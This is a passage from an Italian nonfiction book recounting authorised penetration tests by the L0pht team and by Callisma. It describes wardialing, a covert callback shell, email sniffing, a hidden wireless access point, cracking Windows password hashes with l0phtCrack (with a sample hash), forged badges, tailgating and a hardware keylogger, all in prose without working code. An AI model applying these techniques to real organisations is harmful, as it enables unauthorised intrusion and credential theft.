bar aziendale o da un’altra area usata soprattutto dai dipenden- 
ti per entrare in un’area protetta. Gran parte del personale, e in 
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particolare i dipendenti dei ranghi più bassi, esita ad affrontare 
un estraneo che si infila nell'edificio proprio alle loro spalle, per 
paura che la persona possa essere un dirigente della compagnia. 

Un'altra squadra della IOpht conduceva gli attacchi ai sistemi 
telefonici e alle caselle vocali dell'azienda. Il punto di partenza 
standard è capire qual è il produttore e il tipo di sistema usato 
dalla compagnia, per poi preparare un computer al wardialing, 
vale a dire alla chiamata seriale di un numero interno dopo Pal- 
tro per individuare quei dipendenti che non hanno mai usato una 
password o che usano password che sono facili da indovinare. 
Una volta che ha individuato un telefono vulnerabile, chi attac- 
ca può ascoltare tutti i messaggi registrati (gli hacker telefonici 
— i phreaker - usavano lo stesso metodo per telefonare a carico 
delle aziende). 

Mentre faceva wardialing, la squadra telefonica della IOpht 
identificava anche i numeri interni della compagnia cui rispon- 
deva un modem dial-up. Queste connessioni dial-up, quando ven- 
gono gestite con il metodo della “sicurezza-come-vaghezza”, ri- 
mangono prive di protezione e si trovano spesso sul “lato fidato” 
(trusted) del firewall. 


Il blackout 


I giorni passavano, le squadre raccoglievano informazioni di 
valore, ma Mudge non aveva ancora avuto un'idea brillante per 
produrre il riavvio del sistema in modo da poter accedere alla re- 
te. Poi si verificò una calamità che, per il gruppo, ebbe un risvolto 
prezioso: 


Stavo ascoltando un notiziario quando sentii che c'era stato un 
blackout nella città in cui si trovava la compagnia. 

Era stata in realtà una tragedia perché un lavoratore dei servizi pub- 
blici era morto per l’esplosione di un tombino dall'altra parte della 
città, che era rimasta interamente senza corrente. 

Pensai che se fosse passato un po’ di tempo per ripristinare la cor- 
rente, il sistema di alimentazione di emergenza del server si sareb- 
be con ogni probabilità esaurito. 


Il che significava che il server si sarebbe spento. Una volta ri- 
tornata la corrente in città, il sistema sarebbe ripartito: 


Mi misi a controllare il web server costantemente e poi, a un cer- 
to punto, il sistema andò giù. Dovettero riavviarlo. Per noi la coin- 
cidenza dei tempi era perfetta. Quando il sistema si ripristinò, il 
gioco era fatto: Apache girava come root, proprio come avevamo 
pianificato. 
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A quel punto, la squadra della I0pht era in condizione di com- 

promettere la macchina da cima a fondo, e quello divenne “il no- 
stro primo passo per lanciare un attacco a partire da quel mo- 
mento”. Per Carlos, quella fu “una giornata campale”. 
._ La squadra della l0pht sviluppò un programmino che avreb- 
be reso molto difficile la propria esclusione dal sistema. Di soli- 
to i firewall delle corporation non sono configurati per bloccare 
il traffico în uscita e il programmino di Mudge, installato su uno 
dei server della Newton, ristabiliva ogni pochi minuti una con- 
nessione con uno dei computer controllati dal gruppo. Questo 
collegamento forniva un'interfaccia a linee di comando uguale 
alla “shell a linee di comando” (command line shell) cara agli 
utenti di Unix, Linux e del vecchio sistema operativo Dos. In al- 
tri termini, la macchina della Newton dava regolarmente alla 
squadra di Mudge l'opportunità di digitare dei comandi che ag- 
giravano il firewall della compagnia. 

Per evitare una possibile individuazione, Mudge aveva dato 
al programma un nome che si confondeva con il linguaggio di 
fondo usato dal sistema. Chiunque avesse visto il file avrebbe pen- 
sato che faceva parte del normale ambiente di lavoro. 

Carlos iniziò a fare delle ricerche nei database Oracle nella 
speranza di trovare i dati sugli stipendi dei dipendenti. “Se puoi 
mostrare al direttore dei sistemi informativi di un’azienda il suo 
stipendio e quanti benefit gli sono stati versati, questo di solito 
fa arrivare a destinazione il messaggio che sei riuscito a prenderti 
tutto.” Mudge installò uno sniffer per tutte le e-mail che entra- 
vano e uscivano dall'azienda. Ogni volta che un dipendente del- 
la Newton andava sul firewall per fare del lavoro di manuten- 
zione, la IOpht ne era al corrente. Rimasero scioccati dal vedere 
che per entrare sul firewall veniva usato del testo in chiaro. 

In un breve lasso di tempo, la JOpht era riuscita a penetrare 
l’intera rete, ed era in possesso dei dati che lo dimostravano. Di- 
ce Mudge: “Sai, credo che questo sia il motivo per cui a molte 
aziende non piace effettuare dei penetration test sulla parte in- 
terna delle loro reti. Sanno che la situazione è pessima”. 


Rivelazioni dalle caselle vocali 


La squadra telefonica scoprì che alcuni dirigenti che condu- 
cevano i negoziati per acquisire la l0pht avevano password preas- 
segnate per le loro caselle vocali. Mudge e compagni ottennero 
così svariate informazioni gratuite, alcune delle quali erano as- 
sai divertenti. 

Una delle cose che avevano richiesto come condizione per la 
vendita della l0pht alla compagnia era un'unità per le operazio- 
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ni mobili, un furgone da carico che avrebbero potuto equipag- 
giare con apparecchiature wireless da usare nel corso dei pene- 
tration test per intercettare le comunicazioni wireless non crit- 
tate. Per uno dei direttori, l’idea di comprare un furgone per il 
gruppo della lOpht era talmente offensiva che cominciò a chia- 
marlo il “winnebago”.3 La sua casella vocale era piena di consi- 
derazioni sarcastiche degli altri funzionari della compagnia sul 
winnebago e sulla squadra della lOpht in generale. Mudge ne era 
al contempo divertito e inorridito. 


Il rapporto finale 


Quando il periodo del test giunse a termine, Mudge e la squa- 
dra scrissero il loro rapporto e si prepararono a consegnarlo a un 
incontro cui dovevano partecipare tutti i dirigenti della Newton. 
Le persone della Newton non avevano idea di cosa li aspettasse; 
il gruppo della lOpht sapeva che sarebbe stato un incontro in- 
cendiario. 


Così siamo lì che diamo loro il rapporto e glielo apriamo davanti. E 
vanno in imbarazzo. Questo splendido amministratore di sistema, 
un tipo veramente in gamba, ma noi avevamo installato gli sniffer e 
lo avevamo visto mentre cercava di entrare su uno dei router, pro- 
vare una password senza successo, provarne un'altra senza succes- 
so, e un’altra ancora, fallendo di nuovo. 


Erano le password di amministrazione di tutti i sistemi in- 
terni, che i pen tester avevano ottenuto in un sol colpo in quel- 
l'intervallo di pochi minuti. Mudge ricorda quanto fosse stato ca- 
rino e facile. 


La parte più interessante riguardava i messaggi vocali in cui parla- 
vano. Pubblicamente ci dicevano: “Sì, vi vogliamo tutti”. Ma nei mes- 
saggi vocali che si scambiavano, dicevano: “Beh, vogliamo Mudge, 
ma non vogliamo gli altri, li licenzieremo non appena arrivano”. 


All'incontro gli uomini della 10pht fecero ascoltare alcuni dei - 
messaggi vocali catturati mentre i dirigenti se ne stavano seduti 
ad ascoltare le proprie parole imbarazzanti. Ma il meglio doveva 
ancora venire. Mudge aveva fissato la sessione finale dei nego- 
ziati per l'acquisizione prima dell'incontro sul rapporto. Racconta 
i particolari di quel momento con un'allegria spensierata. 


3 Modello di camper familiare per le vacanze estive. [N.d.7.] 
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Dunque loro entrano e dicono: “Vogliamo darvi questa cifra, è la 
somma più alta cui possiamo arrivare e faremo tutte queste cose”. 
Ma noi sapevamo esattamente quali delle cose che dicevano erano 
vere e quali erano bugie. 

Esordiscono con questa cifra bassa. E ci dicono: “Che ne pensa- 
te?”. Noi ribattiamo: “Beh, non pensiamo di poterci muovere per 
meno di...” e riferiamo la somma che sappiamo essere la loro ci- 
fra più alta. 

E loro fanno: “Oh oh, dobbiamo parlarne, perché non ci date qual- 
che minuto, potete lasciarci da soli nella stanza?”. 

Se non fosse stato per questo genere di cose, ci avremmo pensato 
molto seriamente. Ma loro stavano cercando di fregarci. 


All'incontro sul rapporto — durante le riunioni finali tra i rap- 
presentanti delle due compagnie — Mudge ricorda che “volevamo 
solo essere sicuri di poterli convincere che non c'era una sola 
macchina della rete cui non potevamo avere un accesso pieno”. 
Carlos ricorda le facce di diversi dirigenti “diventare quasi pao- 
nazze” mentre ascoltavano. 

Alla fine il gruppo della JOpht se ne andò. Si tennero i quin- 
dicimila dollari, ma quella volta decisero di non vendere la com- 
pagnia. 


Un gioco allarmante 


Secondo il consulente di sicurezza informatica Dustin Dykes, 
hackerare a scopo di lucro è “esaltante. Capisco gli adrenalina- 
dipendenti, è uno sballo assoluto”. Così il giorno in cui entrò nel- 
la sala conferenze di un’azienda farmaceutica (la chiameremo 
Biotech), per discutere un test di intrusione da eseguire per loro, 
Dustin era di buon umore e ben predisposto alla sfida. 

Come consulente capo per la pratica dei servizi di sicurezza 
della sua compagnia, la Callisma Inc. (oggi parte della Sbc), Du- 
stin aveva chiesto alla sua squadra di presentarsi all'incontro in 
abito da business. Fu colto di sorpresa quando gli uomini della 
Biotech si presentarono in jeans, magliette e pantaloncini, cosa 
quanto mai strana visto che la regione di Boston in quel periodo 
stava soffrendo uno degli inverni più rigidi mai ricordati. 

Nonostante provenga dal ramo amministrativo della gestio- 
ne informatica, e in particolare dalle operazioni di rete, Dustin 
si è sempre considerato un uomo della sicurezza; un atteggia- 
mento che sviluppò quando svolgeva degli incarichi per l'aero- 
nautica, dove, dice, “coltivavo la mia paranoia latente: l’attitudi- 
ne mentale alla sicurezza che ti porta a credere che tutti quelli 
che sono là fuori cercano di fotterti”. 

Il primo contatto con i computer, quando frequentava la se- 
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conda media, lo dovette alla sua matrigna. All’epoca, la donna 
lavorava per un'azienda come amministratrice di sistema. Du- 
stin era affascinato dal suono alieno delle parole che usava quan- 
do parlava di lavoro al telefono. Quando aveva tredici anni, “una 
sera portò a casa un computer che misi in camera mia e inizia 
a programmare per creare dei personaggi di Dungeons and Dra- 
gons che tiravano i dadi per me”. Buttandosi a capofitto nei li- 
bri di Basic e racimolando ogni genere di consigli dagli amici, 
Dustin sviluppò le sue capacità. Imparò da solo come usare un 
modem per chiamare l’ufficio della sua matrigna e giocare ai 
giochi di adventure. All’inizio voleva solo passare più tempo pos- 
sibile al computer, ma crescendo realizzò che il suo spirito li- 
bero non sarebbe andato d'accordo con una vita passata al ter- 
minale. Come consulente di sicurezza avrebbe potuto combi- 
nare il suo talento con il suo bisogno di libertà. Fu sicuramen- 
te una “trovata eccezionale”. 

La decisione di fare carriera nella sicurezza si rivelò giusta. 
“Questo lavoro mi dà i brividi,” dice. “E come una partita a scac- 
chi. Per ogni mossa c'è una contromossa. Ogni mossa cambia l'in- 
tera dinamica del gioco.” 


Regole d'ingaggio 


È logico che ogni compagnia si preoccupi per la propria vul- 
nerabilità e si chieda se sta facendo un buon lavoro nel proteg- 
gere la propria proprietà intellettuale e i propri dipendenti dagli 
intrusi elettronici che cercano di mettere le mani su informazio- 
ni personali, nonché dalla perdita di fiducia pubblica che segue 
inevitabilmente un’intrusione altamente pubblicizzata. 

Alcune compagnie sono motivate da ragioni ancora più pres- 
santi, come il non inimicarsi le agenzie governative di controllo, 
il che vorrebbe dire perdere un contratto importante o arretrare 
in un progetto di ricerca fondamentale. Tutte le aziende che han- 
no un contratto con il Dipartimento della difesa rientrano in que- 
sta categoria. Lo stesso vale per quelle aziende, come il nuovo 
cliente della Callisma, che fanno ricerche sensibili nel campo del- 
le biotecnologie e hanno il fiato sul collo della Food and Drug Ad- 
ministration. C'erano di mezzo gli additivi chimici pericolosi e 
laboratori in cui gli scienziati stavano conducendo ricerche di cui 
gli “hacker a noleggio” non sapevano niente, e proprio per que- 
sto sarebbe stata una sfida allettante. 

All'incontro iniziale con la Biotech, il gruppo della Callisma 
apprese che la compagnia voleva essere colpita da tutti i tipi di 
attacco che un vero avversario potrebbe tentare: attacchi tecnici 
semplici e complessi, social engineering e intrusioni fisiche. Co- 
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me spesso avviene in questi casi, i dirigenti dell'information te- 
chnology della compagnia erano sicuri che i penetration tester 
avrebbero visto i loro sforzi vanificati. E così la Biotech mise sul 
tavolo le regole per andare a punteggio: non avrebbero accettato 
nulla che non fosse stato supportato da solide prove. 

Si stabilì che il test avrebbe compreso una procedura di “stop 
immediato”. In alcuni casi, questa procedura può essere un sem- 
plice codice verbale su cui ci si accorda, che può essere usato da 
un qualsiasi dipendente incaricato di fermare un attacco che stia 
influendo in modo negativo sul lavoro dell’azienda. L'azienda die- 
de anche delle indicazioni sul trattamento delle informazioni con- 
fidenziali compromesse: il modo in cui dovevano essere conser- 
vate, quando sarebbero state rivelate e a chi. 

Visto che un test di intrusione comporta la possibilità di even- 
ti che possano interferire con il lavoro della compagnia, c'è bi- 
sogno di definire preventivamente diverse ipotesi di lavoro. Chi 
sarà la persona informata nella catena di comando nel caso in 
cui si verifichi l'interruzione di un servizio? Quali sono esatta- 
mente le parti del sistema che possono essere compromesse, e in 
quale forma? In che modo i penetration tester possono sapere fi- 
no a che punto possono condurre un attacco, prima che si veri- 
fichino danni o perdite irreparabili? 

I clienti richiedono spesso solo un penetration test che com- 
porta un attacco di tipo tecnico e sottostimano altre minacce che 
potrebbero lasciare la compagnia ancora più vulnerabile. Come 
dice Dustin Dykes: 


AI di là di quello che dicono, so bene che il loro obiettivo principa- 
le è identificare le debolezze del loro sistema, ma di solito sono vul- 
nerabili in un altro modo. Un vero intruso andrà alla ricerca della 
resistenza minore, dell'anello più debole nella catena di sicurezza. 
Come l’acqua che scorre giù dalla collina, colui che attacca seguirà 
il metodo più liscio, che ha le maggiori probabilità di successo con 
le persone. 


Gli attacchi di social engineering, mette in guardia Dustin, 
dovrebbero sempre essere inclusi nei penetration test di una com- 
pagnia. (Per approfondire l'ingegneria sociale, vedi il capitolo 10.) 

Ma Dustin sarebbe stato ben felice di rinunciare a quest'altra 
parte del repertorio. Se non deve tentare l'ingresso fisico, non è 
certo lui a insistere per farlo. Per lui, è l’ultima spiaggia, anche 
se ha con sé il suo lasciapassare per uscire di prigione: “Se c'è 
qualcosa che deve andare veramente storto, è probabile che ac- 
cada quando cerco di intrufolarmi in un edificio senza farmi no- 
tare dalla sicurezza o da qualche dipendente sospettoso”. 

Infine, la squadra del penetration test ha anche bisogno di sa- 
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pere qual è il Santo Graal. In un gioco di pedinamento elettroni- 
co in cui la posta è così alta, è vitale saperlo con precisione. Per 
la compagnia farmaceutica, il Santo Graal erano i loro registri fi- 
nanziari, i nomi dei clienti e dei fornitori, i processi di produ- 
zione e i file sui loro progetti di ricerca e sviluppo. 


Pianificazione 


Il piano di Dustin per il test richiedeva una partenza “in mo- 
dalità silenziosa”. Mantenere un profilo basso, per poi diventare 
lentamente sempre più visibili finché qualcuno non li avrebbe al- 
la fine notati e alzato una bandiera per segnalarli. Questo ap- 
proccio deriva dalla filosofia di Dustin sui progetti per i pene- 
tration test, che si chiama “red teaming”: 


Quello che cerco di raggiungere con il lavoro di red teaming nasce 
dalla posizione difensiva assunta dalle compagnie. Loro ragionano 
così: “Conosciamo la mentalità dell’hacker. Come possiamo difen- 
derci da essa?”. Il che è già un punto a loro sfavore. Non possono 
sapere come [gli hacker] agiranno o reagiranno, se non sanno ciò 
che è importante per loro. 


Sono d'accordo. Come scrisse Sun Tzu: conosci il tuo nemi- 
co e conosci te stesso, e sarai vittorioso. 

Durante tutti i penetration test - quando il cliente è d’accor- 
do - Dustin usa lo stesso tipo di attacchi già descritti in questo 
capitolo: 


Identifichiamo nella nostra metodologia quattro aree: l'ingresso tec- 
nico nella rete, che costituisce la maggior parte del nostro lavoro. 
L'ingegneria sociale [che per noi comprende anche], l’intercettazio- 
ne e il “surfare da dietro le spalle”. Il “tuffo nella spazzatura”. E poi 
anche l’ingresso fisico. Queste sono le quattro aree. 


(“Il surfare da dietro le spalle” è un'espressione colorita che 
descrive lo spiare un dipendente mentre digita la sua password. 
Un attaccante esperto in quest'area sa come guardare le dita men- 
tre corrono sulla tastiera, onde carpire quello che la persona ha 
digitato anche mentre finge di non prestarle attenzione.) 


Attacco! 
Il primo giorno Dustin entrò nell’androne della Biotech. Sul- 


la destra della postazione di guardia c'erano un bagno e il bar 
aziendale, entrambi facilmente accessibili ai visitatori. Dalla par- 
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te opposta c’era la sala conferenze dove il gruppo di Dustin si era 
incontrato con i dirigenti della Biotech. La guardia era posizio- 
nata al centro per controllare l’accesso principale alle entrate pro- 
tette, ma la sala conferenze rimaneva completamente fuori dal- 
la sua visuale. Chiunque sarebbe potuto entrare, senza dover ri- 
spondere a una sola domanda. Il che è esattamente quanto fece- 
ro Dustin e il suo collega di lavoro. Quindi ebbero tutto il tempo 
che volevano per guardarsi intorno con tutta calma. Dopotutto, 
nessuno sapeva che si trovavano lì. 

Trovarono una presa di rete scoperta, probabilmente a di- 
sposizione del personale dell'azienda che voleva accedere alla re- 
te interna durante gli incontri. Inserendo un cavo Ethernet dal 
suo portatile nella presa a muro, Dustin scoprì velocemente quel- 
lo che si aspettava: era entrato nella rete interna da dietro al fi- 
rewall della compagnia, il che era un invito aperto a entrare nel 
loro sistema. 

Come in una scena che dovrebbe avere la colonna sonora di 
Mission Impossible sullo sfondo, Dustin assicurò al muro un pic- 
colo apparecchio perl’accesso wireless e lo infilò nella presa. L'ap- 
parecchio avrebbe permesso al gruppo di Dustin di penetrare la 
rete della Biotech da computer situati in un’auto o in un furgo- 
ne parcheggiato nelle vicinanze, ma fuori dall'edificio della com- 
pagnia. Le trasmissioni da un punto d'accesso wireless (Wap) di 
questo tipo possono arrivare anche da una distanza di novecen- 
to metri. Se si usa un'antenna direzionale ad ampio raggio ci si 
può collegare al Wap nascosto anche da una distanza maggiore. 

Dustin preferisce i dispositivi d'accesso wireless che operano 
sui canali europei, il che dà alla sua squadra di intrusione un van- 
taggio decisivo, perché è meno probabile che le frequenze ven- 
gano individuate. Inoltre, “non sembra un punto d'accesso wire- 
less e così non insospettisce la gente. Li ho lasciati installati per 
quasi un mese senza che fossero notati e smontati”. 

Quando installa uno di questi apparecchi, Dustin affigge an- 
che un biglietto piccolo, ma che sembra ufficiale che dice: “Pro- 
prietà dei servizi di sicurezza informativa. Non rimuovere”. 

Con temperature che arrivavano a sette gradi sotto lo zero, 
né Dustin né i suoi compagni di squadra, che indossavano ora 
jeans e maglietta per coordinarsi con l’immagine della Biotech, 
volevano congelarsi il sedere in una macchina parcheggiata lì fuo- 
ri. Così apprezzarono il fatto che la Biotech avesse messo a loro 
disposizione una piccola stanza in un’area non sorvegliata, in un 
edificio nelle vicinanze. Niente di speciale, ma la stanza era ri- 
scaldata e nel raggio dell’apparecchio wireless. Erano collegati; 
per la compagnia, un po’ troppo collegati. 

Non appena la squadra iniziò a esplorare la rete della Biotech, 
il primo tentativo di ricognizione portò all'individuazione di circa 


153 


quaranta macchine su cui girava Windows, che avevano un ac- 
count da amministratore senza password, o con la password “pass- 
word”. In altre parole, erano del tutto prive di sicurezza. Come ab- 
biamo notato nelle storie precedenti, questo è quanto avviene, sfor- 
tunatamente, sul lato trusted delle reti locali delle corporation, con 
le compagnie che si concentrano sui controlli di sicurezza lungo il 
perimetro per tenere alla larga i malintenzionati, ma lasciano le 
macchine esposte all'attacco dall'interno. Un intruso che trova il 
modo di penetrare o aggirare il firewall, è a casa sua. 

Dopo aver compromesso una di queste macchine, Dustin 
estrasse tutti gli hash delle password di ciascun account e lanciò 
il seguente file tramite il programma l0phtCrack. 


lOphtCrack al lavoro 


Su una macchina Windows, le password utente sono archi- 
viate in forma crittata (“Thash”) in un’area chiamata Security Ac- 
counts Manager (o Sam); le password non sono solo crittate, ma 
sono crittate in una forma alternata conosciuta come “hash a sen- 
so unico”, che significa che algoritmo di crittazione convertirà 
la password di testo semplice nella sua forma crittata, ma non 
può riconvertire la forma crittata in testo semplice. 

Il sistema operativo Windows archivia due versioni dell’hash 
nel Sam. Una, il “Lan Manager hash”, o Lanman, è una versione 
ereditata, un lascito del periodo precedente a Windows NT. L'hash 
Lanman viene calcolato dalla versione maiuscola della password 
dell'utente ed è diviso in due parti di sette caratteri ciascuna. Per 
tali proprietà, questo tipo di hash è molto più facile da craccare 
del suo successore, il NT Lan Manager (Ntlm), che tra le altre ca- 
ratteristiche riconosce anche i caratteri minuscoli. 

A scopo esplicativo, ecco un vero hash di un amministratore 
di sistema di una compagnia di cui non farò il nome: 


Administrator:500:AA33FDF289D20A799FB3AF221F3220DC:0AB 
C818FE05A120233838B9131F366BB1::: 


La sezione tra i due punti che inizia con “AA33” e finisce 
con “20DC” è l'hash Lanman. La sezione compresa tra “0ABC” 
e “66BB1” è hash Ntlm. Entrambe sono lunghe trentadue ca- 
ratteri, entrambe rappresentano la stessa password, ma per la 
prima è molto più facile craccare e recuperare la password di 
testo semplice. 

Visto che molti utenti scelgono una password che è un nome 
o una parola semplice del dizionario, chi attacca di solito inzia 
con il predisporre I0phtCrack (o un qualsiasi altro programma 
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affine) per realizzare un “attacco da dizionario”, cioè la ricerca 
di tutte le parole del dizionario per vedere se tra queste c’è la pass- 
word dell'utente. Se il programma non ottiene alcun successo con 
l'attacco da dizionario, lancia quindi un “attacco da forza bruta”, 
nel qual caso il programma prova ogni combinazione possibile 
(per esempio, AAA, AAB, AAC... ABA, ABB, ABC, e via dicendo), 
per poi tentare delle combinazioni che comprendono maiuscole 
e minuscole, numeri e simboli. 

Un programma efficiente come l0phtCrack può craccare pass- 
word semplici (del tipo usato dal 90 percento della popolazione) 
in pochi secondi. Quelle più complicate possono richiedere ore 
o giorni, ma quasi tutte le password soccombono nel tempo ne- 
cessario. 


L'accesso 
Dustin riuscì subito a craccare gran parte delle password: 


Cercai di entrare nel controller del dominio primario con la pass- 
word [del amministratore] e funzionò. Usavano la stessa password 
per la macchina locale e per l'account del dominio. Ora avevo i di- 
ritti da amministratore per l’intero dominio. 


Il Controller del dominio primario (Pdc) conserva il master 
del database contenente gli account degli utenti che accedono al 
dominio. Quando un utente entra nel dominio, il Pdc autentica 
la richiesta di login con le informazioni contenute nel suo data- 
base. Questo master del database degli account viene anche co- 
piato nel Controller di backup*4 del dominio (Bdc), come precau- 
zione nel caso in cui il Pdc vada giù. Questa architettura è stata 
sostanzialmente cambiata con l’uscita di Windows 2000. Le ver- 
sioni recenti di Windows usano quella che viene chiamata una 
“directory attiva”, ma per mantenere una compatibilità con le 
vecchie versioni di Windows c’è almeno un sistema che si com- 
porta come il Pdc per il dominio. 

Ora aveva le chiavi per entrare nel regno della Biotech e ac- 
cedere a diversi documenti interni, etichettati come “confiden- 
ziale” o “a solo uso interno”. Nella sua modalità iperconcentra- 
ta, Dustin passò ore a raccogliere informazioni sensibili dai file 
altamente confidenziali sulla sicurezza dei farmaci, che conte- 
nevano informazioni dettagliate sui possibili effetti collaterali del- 
le medicine prodotte dalla compagnia. Considerata la natura del 
ramo d'impresa della Biotech, l’accesso a queste informazioni è 


4 H backup è la copia di riserva, il master l'originale. 
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strettamente regolato dalla Food and Drug Administration, e un 
penetration test riuscito dovrebbe essere oggetto di un rapporto 
formale all'agenzia. 

Dustin riuscì anche a entrare nel database dei dipendenti da 
cui ricavò il loro nome e cognome, indirizzo e-mail, numero di 
telefono, settore, posizione occupata e così via. Usando queste 
informazioni poté selezionare un obiettivo per la fase successiva 
dell'attacco. La persona che scelse fu un amministratore di si- 
stema dell'azienda incaricato di supervisionare il penetration 
test: “Pensai che anche se avevo già moltissime informazioni sen- 
sibili, volevo dimostrare che esistevano dei vettori molteplici per 
l'attacco”, vale a dire che c'era più di un modo per compromet- 
tere la sicurezza delle informazioni. 

Il team della Callisma aveva imparato che se vuoi entrare in 
un’area protetta, non esiste un modo migliore che confondersi 
con un gruppo di dipendenti che chiacchierano di ritorno dal 
pranzo. In confronto alle ore del mattino e della sera, quando le 
persone possono essere nervose o irritabili, dopo pranzo esse ten- 
dono a essere meno vigili, essendo forse un po’ appesantite dal- 
l’attività del sistema digestivo. La conversazione è amichevole, 
mentre il senso di convivialità si alimenta di giochi sociali che 
fluiscono liberamente. Uno dei trucchi preferiti di Dustin è pren- 
dere d'occhio qualcuno mentre si appresta a lasciare il bar. Du- 
stin cammina avanti al prescelto e gli apre la porta per poi se- 
guirlo. Nove volte su dieci — anche se sta entrando in un'area pro- 
tetta — la persona selezionata restituirà la cortesia tenendo gen- 
tilmente aperta la porta. E Dustin può entrare, senza fatica. 


Allertati 


Una volta selezionato l'obiettivo, la squadra doveva trovare 
un modo per entrare fisicamente nell’area protetta onde poter in- 
serire nel computer prescelto un “keystroke logger”, un apparec- 
chio che registra ogni tasto digitato sulla tastiera, persino i tasti 
digitati in avvio, prima che il sistema operativo sia stato carica- 
to. Installato sulla macchina di un amministratore di sistema, 
avrebbe probabilmente intercettato le password di accesso a di- 
versi sistemi della rete interna. Poteva anche significare che gli 
esecutori dei test sarebbero venuti a conoscenza dei messaggi ri- 
guardanti qualsiasi tentativo di individuare i loro attacchi. 

Dustin non voleva rischiare di essere colto sul fatto mentre 
entrava alle spalle di un dipendente. Ci voleva un piccolo trucco 
di social engineering. Godendo di libero accesso all’androne e al . 
bar, diede una bella sbirciata ai badge dei dipendenti e si preparò 
a contraffarne uno per se stesso. Il logo non era un problema. Lo 
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copiò semplicemente dal sito della compagnia e lo incollò nel suo 
disegno. Era sicuro che non avrebbe avuto bisogno di passare un 
esame ravvicinato. 

Alcuni settori della Biotech si trovavano in un edificio nelle vi- 
cinanze, una struttura in condivisione con altri uffici affittati a di- 
verse compagnie. All'ingresso c'era sempre una guardia in servi- 
zio, anche di notte e nei fine settimana, e un noto lettore di tesse- 
re magnetiche che sblocca la porta di ingresso dell’androne quan- 
do un dipendente passa il badge con il codice elettronico giusto: 


Ci vado nel fine settimana e mi appresto a passare il falso badge che 
avevo realizzato. Passo il badge nel lettore e naturalmente non fun- 
ziona. Arriva la guardia, mi apre la porta e mi fa un sorriso. Gli sor- 
rido anch'io e gli passo davanti. 


Senza che i due si scambiassero una sola parola, Dustin era 
riuscito a passare davanti alla guardia e a entrare nell’area pro- 
tetta. 

Ma gli uffici della Biotech rimanevano ancora al sicuro al di 
là di un altro lettore: 


Non c'è nessuno lì nei fine settimana cui accodarsi. Così, alla ricer- 
ca di un modo alternativo per entrare, salgo lungo una scala a vetri 
fino al secondo piano e penso che proverò a vedere se la porta è aper- 
ta o no. La spingo, si apre subito, non è richiesto alcun badge. 

Ma gli allarmi scattano dappertutto. Apparentemente sto entrando 
da un'uscita antincendio. Saltò dentro, la porta si chiude violente- 
mente dietro di me. All’interno c'è un cartello che dice: “Non apri- 
re, o suonerà l'allarme”. Ho il cuore che mi batte a mille. 


Il fantasma 


Dustin sapeva esattamente qual era la stanzetta che gli inte- 
ressava. Il database dei dipendenti compromesso dalla squadra 
conteneva anche un listato con la posizione fisica dei cubicoli di 
ciascun lavoratore. Con il campanello d'allarme che ancora gli 
rimbombava nella testa, Dustin puntò la postazione prescelta. 

Colui che attacca può venire a conoscenza di tutti i tasti di- 
gitati su un computer installando un software che li registra e 
spedisce periodicamente i dati a un indirizzo specifico. Ma, de- 
terminato a dimostrare al cliente che l'azienda era esposta a di- 
versi tipi di violazione dall'esterno, Dustin voleva usare un mez- 
zo fisico per fare testimoniare quanto accadeva. 

Lo strumento che utilizzò a questo scopo era il Keyghost (fi- 
gura). Si tratta di un oggetto dall'aspetto innocente che collega 
la tastiera e il computer e che, grazie alle sue dimensioni in mi- 
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niatura, è pressoché garantito che passi inosservato. Un model- 
lo può archiviare fino a mezzo milione di tasti digitati, che per 
l'utente medio di computer corrispondono a settimane di digita- 
zione. (Questo metodo presenta in ogni caso una controindica- 
zione. L'intruso è costretto a ritornare sul posto per recuperare il 
registratore e leggere i dati.) 


A Dustin bastarono pochi secondi per staccare il cavo della 
tastiera dal computer, inserire il Keyghost, e ricollegare il cavo. 
Farlo velocemente era una priorità perché “do per scontato che 
il livello di allarme si sia alzato, il tempo rimasto è agli sgoccio- 
li e le mie mani tremano leggermente. Mi scopriranno. So che di 
fondo non accadrà niente di terribile perché ho il mio lasciapas- 
sare per uscire di prigione ma, anche così, l'adrenalina non smet- 
te di scorrere”. 

Non appena installato il Keyghost, Dustin scese per la scala 
principale, che lo condusse vicino alla cabina della sicurezza. Ap- 
plicando un'altro trucco di social engineering, prese il toro per le 
corna: 


Uscii di proposito dalla porta che era proprio vicino alla sicurezza. 
Invece di cercare di evitare la sicurezza mentre uscivo, andai diret- 
tamente [dalla guardia]. Gli dissi: “Guardi, mi dispiace per aver fat- 
to scattare l'allarme, sono stato io. Non vengo mai in questa palaz- 
zina, non pensavo sarebbe accaduto, mi scuso veramente”. E la guar- 
dia rispose: “Oh, non c'è problema”. 

Poi prese il telefono, e così pensai che doveva aver chiamato qual- 
cuno quando l'allarme era scattato e ora lo stava richiamando per 
dirgli: “Falso allarme, tutto a posto”. Non rimasi lì ad ascoltare. 


Tutto liscio 


Il penetration test si avvicinava alla fine. I dirigenti dell’a- 
zienda responsabili della sicurezza erano così sicuri che gli in- 
cursori non sarebbero stati capaci di violare la rete né di entrare 
fisicamente negli edifici in modo non autorizzato, eppure nessun 
membro del gruppo era ancora stato fermato. Dustin aveva al- 
zato a poco a poco il “volume”, rendendo la presenza del gruppo 
sempre più evidente. Eppure ancora niente. 


158 


Curiosi di capire fin dove si sarebbero potuti spingere, diver- 
si membri del team entrarono in un edificio aziendale alle spal- 
le di un dipendente. Trascinavano un'enorme antenna, un appa- 
recchio meccanico che non poteva passare inosservato e richie- 
deva uno sforzo notevole per essere trasportato. Qualche dipen- 
dente avrebbe senz'altro notato lo strano strumento, si sarebbe 
chiesto cosa fosse e avrebbe chiamato qualcuno. 

Così, senza tessere di riconoscimento, il gruppo iniziò ad ag- 
girarsi per il primo degli edifici protetti della Biotech e poi nel 
secondo, per tre ore. Nessuno gli disse nulla. Nessuno fece nean- 
che una sola domanda del tipo: “Che diavolo è quell’affare?”. La 
reazione più forte che ottennero fu quella di una guardia di si- 
curezza che li superò in una sala, diede loro uno sguardo strano 
e proseguì senza neanche voltarsi. 

La squadra della Callisma arrivò alla conclusione che, come 
per la maggior parte delle organizzazioni, chiunque poteva arri- 
vare dalla strada, portare con sé il proprio equipaggiamento, sen- 
za che fosse fermato, né che gli fosse chiesta una spiegazione o 
di mostrare un'autorizzazione. Dustin e compagni avevano tira- 
to la corda al massimo senza essere fermati. 


Il trucco dello scaldamani 


La chiamano “richiesta di uscita” (o rex), ed è una tecnologia 
comune a molti edifici aziendali come quello della Biotech. Al- 
l'interno di un’area protetta come un laboratorio di ricerca, ti av- 
vicini a una porta per uscire e il tuo corpo attiva un sensore al 
calore o al movimento che sblocca il lucchetto in modo da la- 
sciarti uscire; se stai trasportando, diciamo, un contenitore di 
